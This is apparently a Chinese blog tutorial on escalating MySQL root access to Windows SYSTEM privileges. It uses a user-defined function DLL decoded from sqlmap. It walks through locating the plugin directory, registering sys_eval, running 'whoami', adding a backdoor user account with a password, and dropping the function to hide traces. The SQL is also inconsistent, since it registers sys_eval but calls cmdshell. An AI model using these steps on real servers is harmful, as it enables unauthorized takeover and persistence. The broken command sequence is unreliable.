01

前言

udf = ‘user defined function‘，即‘用户自定义函数’。文件后缀为‘.dll’，常用c语言编写。

通过在udf文件中定义新函数，对MYSQL的功能进行扩充，可以执行系统任意命令。将MYSQL账号root转化为系统system权限。

02

思路

1.将udf文件上传到指定位置

sqlmap中有现成的udf文件，有linux版本和windows版本分为32位和64位，一定要选择对应系统的对应版本版本，否则会显示：Can‘t open shared library ‘udf.dll‘。尤其要注意

    sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll_

    sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_

但是sqlmap 中 自带 的shell 以及一些二进制文件，为了防止被误杀都经过异或方式编码，不能直接使用的。

可以利用sqlmap 自带的解码工具cloak.py，进入到 sqlmap\extra\cloak\cloak 目录下，执行命令：

python ./cloak.py -d -i  sqlmap\data\udf\mysql\windows\32\lib_mysqludf_sys.dll_ -o lib_mysqludf_sys.dll

会在当前目录下生成一个解锁后的lib_mysqludf_sys.dll

通过以下命令查看mysql的运行环境

show  variables like '%version%';

show variables like '%compile%';

或者

select @@version_compile_machine;

可以判断是在64为的cpu上运行了win32的系统，因此我们的mysql程序也是32位的。在使用udf.dll文件时应该使用windows系统下32位的文件

sqlmap中的udf文件提供的函数：

sys_eval，执行任意命令，并将输出返回。

sys_exec，执行任意命令，并将退出码返回。

sys_get，获取一个环境变量。

sys_set，创建或修改一个环境变量。

有了udf文件，接下来就是利用各种办法上传到网站指定目录下 

MySQL<5.0，导出路径随意；

5.0 <= MySQL<5.1，则需要导出至目标服务器的系统目录(如：c:/windows/system32/)

MySQL 5.1以上版本，必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。

通过以下命令查看mysql版本

select @@version;

select version();

根据不同的版本号，将udf.dll文件上传到对应的目录下。

本人所测试的mysql版本是5.5.53因此需要将udf.dll文件上传到mysal/lib/plugin目录下；

可以通过以下命令查看plugin文件夹的绝对路径：

select @@plugin_dir;

本次只讨论udf提权，上传过程忽略

create function sys_eval returns string soname 'udf.dll';

select cmdshell ('whoami');

select cmdshell ('net user aaa abc123!@# /add');

消除痕迹

drop function sys_eval;

扫码关注

微信号：JIANJIEXX_